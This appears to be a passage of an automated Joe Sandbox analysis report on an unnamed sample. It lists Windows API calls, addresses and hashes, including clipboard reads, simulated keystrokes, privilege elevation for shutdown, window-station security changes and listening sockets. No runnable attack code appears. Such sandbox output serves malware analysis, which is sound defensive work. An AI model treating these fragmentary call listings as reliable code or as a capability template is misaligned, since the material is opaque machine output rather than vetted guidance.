                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0024FA47
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0024FAA9
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FAD3
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0024FB12
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FB3D
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0024FB55
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0024FB60
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024FB81
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0024FB8E
                                                                                                                                                                  • GetParent.USER32(?), ref: 0024FBAA
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0024FC10
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FC40
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024FC96
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0024FCC2
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0024FCEA
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FD0D
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024FD57
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0024FD87
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024FE1C
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0024AFDB
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 001FF796
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00254388
                                                                                                                                                                  • IsIconic.USER32(000000FF), ref: 00254391
                                                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 0025439E
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002543A8
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002543BE
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 002543C5
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002543D1
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002543E2
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002543EA
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 002543F2
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002543F5
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025440A
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254415
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025441F
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254424
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025442D
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254432
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025443C
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254441
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00254444
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0025446B
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(0027DBF0), ref: 002370C3
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 002370D1
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 002370D9
                                                                                                                                                                  • CloseClipboard.USER32 ref: 002370E5
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00237101
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0023710B
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00237120
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0023712D
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00237135
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00237142
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00237176
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00237283
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021BF0F
                                                                                                                                                                    • Part of subcall function 0021BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021BF3C
                                                                                                                                                                    • Part of subcall function 0021BEC3: GetLastError.KERNEL32 ref: 0021BF49
                                                                                                                                                                  • _memset.LIBCMT ref: 0021BA34
                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0021BA86
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0021BA97
                                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0021BAAE
                                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 0021BAC7
                                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0021BAD1
                                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0021BAEB
                                                                                                                                                                    • Part of subcall function 0021B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0021B9EC), ref: 0021B8C5
                                                                                                                                                                    • Part of subcall function 0021B8B0: CloseHandle.KERNEL32(?,?,0021B9EC), ref: 0021B8D7
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00232065
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023207A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232091
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002320A3
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002320D5
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002320E0
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002320FC
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232123
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023213A
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0023214C
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00293A68), ref: 0023216A
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00232174
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232181
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232191
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Attributes
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0024F14B
                                                                                                                                                                    • Part of subcall function 0024D5EE: ClientToScreen.USER32(?,?), ref: 0024D617
                                                                                                                                                                    • Part of subcall function 0024D5EE: GetWindowRect.USER32(?,?), ref: 0024D68D
                                                                                                                                                                    • Part of subcall function 0024D5EE: PtInRect.USER32(?,?,0024EB2C), ref: 0024D69D
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0024F1B4
                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0024F1BF
                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0024F1E2
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0024F212
                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0024F229
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0024F242
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0024F259
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0024F27B
                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 0024F282
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0024F36D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002321C0
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 002321D5
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 002321EC
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0023221B
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232226
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00232242
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232269
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232280
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00232292
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00293A68), ref: 002322B0
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002322BA
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002322C7
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002322D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$Close$CurrentDirectoryFirstNext
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 4190467141-438819550
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove_memset
                                                                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0024ED0C
                                                                                                                                                                  • GetFocus.USER32 ref: 0024ED1C
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0024ED27
                                                                                                                                                                  • _memset.LIBCMT ref: 0024EE52
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 0024EE7D
                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0024EE9D
                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0024EEB0
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0024EEE4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0024EF2C
                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0024EF64
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0024EF99
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                    • Part of subcall function 0021B8E7: RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                    • Part of subcall function 0021B982: GetProcessHeap.KERNEL32(00000008,0021B3E1,00000000,00000000,?,0021B3E1,?), ref: 0021B98E
                                                                                                                                                                    • Part of subcall function 0021B982: RtlAllocateHeap.NTDLL(00000000,?,0021B3E1), ref: 0021B995
                                                                                                                                                                    • Part of subcall function 0021B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0021B3E1,?), ref: 0021B9A6
                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0021B3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 0021B411
                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0021B430
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B441
                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0021B47E
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0021B49A
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B4B7
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0021B4C6
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0021B4CD
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0021B4EE
                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 0021B4F5
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0021B526
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0021B54C
                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0021B560
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                                                  • Opcode ID: 7d26b1d5bcdefa23618cf18b2b10997ef1229bd6ffefc1d9a7ca0e42e2cec7ed
                                                                                                                                                                  • Instruction ID: 8f19b6a22180502228b89b5fcb36395c39dcb13bd7f5d3962adf5833fb6224d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d26b1d5bcdefa23618cf18b2b10997ef1229bd6ffefc1d9a7ca0e42e2cec7ed
                                                                                                                                                                  • Instruction Fuzzy Hash: EA514B71E1020ABBDF01DFA4DC49AEEBBB9FF14700F048129F915A6291DB709A55CF60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 00227B9F: __wsplitpath.LIBCMT ref: 00227BBC
                                                                                                                                                                    • Part of subcall function 00227B9F: __wsplitpath.LIBCMT ref: 00227BCF
                                                                                                                                                                    • Part of subcall function 00227C0C: GetFileAttributesW.KERNEL32(?,00226A7B), ref: 00227C0D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226B9D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226BBB
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226BE2
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00226BF8
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00226C57
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226C6A
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226C7D
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00226CAB
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00226D37
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226D53
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226D61
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find_wcscat$File__wsplitpath$Close$AttributesFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 481317943-1173974218
                                                                                                                                                                  • Opcode ID: 723ff97126a2ce473e7af19960a348ecc5a6a181fe83ccf4e8a04f9752d43bad
                                                                                                                                                                  • Instruction ID: 667c1d352abd0fe8cdc615b3c13bad6d75769b97da340db513500b0f4a582eaa
                                                                                                                                                                  • Opcode Fuzzy Hash: 723ff97126a2ce473e7af19960a348ecc5a6a181fe83ccf4e8a04f9752d43bad
                                                                                                                                                                  • Instruction Fuzzy Hash: 8551357291416DBACB21EBD0EC89EDE777CAF05304F4445D6E54993041DB709B58CF61
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                                  • API String ID: 0-2893523900
                                                                                                                                                                  • Opcode ID: e90a93d0f6c089938926b4e4b68a9f9d0aa550fa4e55d633e72ee43338227eef
                                                                                                                                                                  • Instruction ID: 877431699e7deb9b1e9d67721fc30b746d66e02d9724753a3ff5d8d948fb70e9
                                                                                                                                                                  • Opcode Fuzzy Hash: e90a93d0f6c089938926b4e4b68a9f9d0aa550fa4e55d633e72ee43338227eef
                                                                                                                                                                  • Instruction Fuzzy Hash: A062B2B1E10659DBDF24CF99C8807AEB7B5BF58350F25816AE805EB281D7709E80CF90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 00227C0C: GetFileAttributesW.KERNEL32(?,00226A7B), ref: 00227C0D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226E7E
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226E99
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00226EAE
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00226EDD
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226EEF
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226F01
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00226F22
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226F3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind_wcscat$AttributesCloseFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 1343497842-1173974218
                                                                                                                                                                  • Opcode ID: e2a01c6ddc1f1d6f030c7fa942012444e13068f51b7faa219dbfec0174e45a69
                                                                                                                                                                  • Instruction ID: daaff09244f374fec47dda79c44d88b41aa1ae3484f36dda97e938a09cca7a06
                                                                                                                                                                  • Opcode Fuzzy Hash: e2a01c6ddc1f1d6f030c7fa942012444e13068f51b7faa219dbfec0174e45a69
                                                                                                                                                                  • Instruction Fuzzy Hash: 9121D172418349BAC710EFE0E8889DBBBDC9F59310F044A5AF4D4C3042EA30D62C8BA2
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                                  • Opcode ID: 7ba08963be01d1b6d08dddd7c5c0a87a0e431f804b8d194999f9684ef65c01f7
                                                                                                                                                                  • Instruction ID: f34314cf3f4f0d7a21830994d729612803f969a89a53033aabbc50ca57503f09
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba08963be01d1b6d08dddd7c5c0a87a0e431f804b8d194999f9684ef65c01f7
                                                                                                                                                                  • Instruction Fuzzy Hash: C121A171714219AFDB10AF64FC59B6E7BA8EF54720F048019F90ADB2A1DBB4ED508B90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002324F6
                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00232526
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023253A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232555
                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002325F3
                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00232609
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                  • API String ID: 0-1546025612
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021BF0F
                                                                                                                                                                    • Part of subcall function 0021BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021BF3C
                                                                                                                                                                    • Part of subcall function 0021BEC3: GetLastError.KERNEL32 ref: 0021BF49
                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0022830C
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                                                  APIs
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00239235
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239244
                                                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00239260
                                                                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 0023926F
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239289
                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0023929D
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: hN)$tM)
                                                                                                                                                                  • API String ID: 4104443479-2809899604
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • _memmove.LIBCMT ref: 00253020
                                                                                                                                                                  • _memmove.LIBCMT ref: 00253135
                                                                                                                                                                  • _memmove.LIBCMT ref: 002531DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1300846289-0
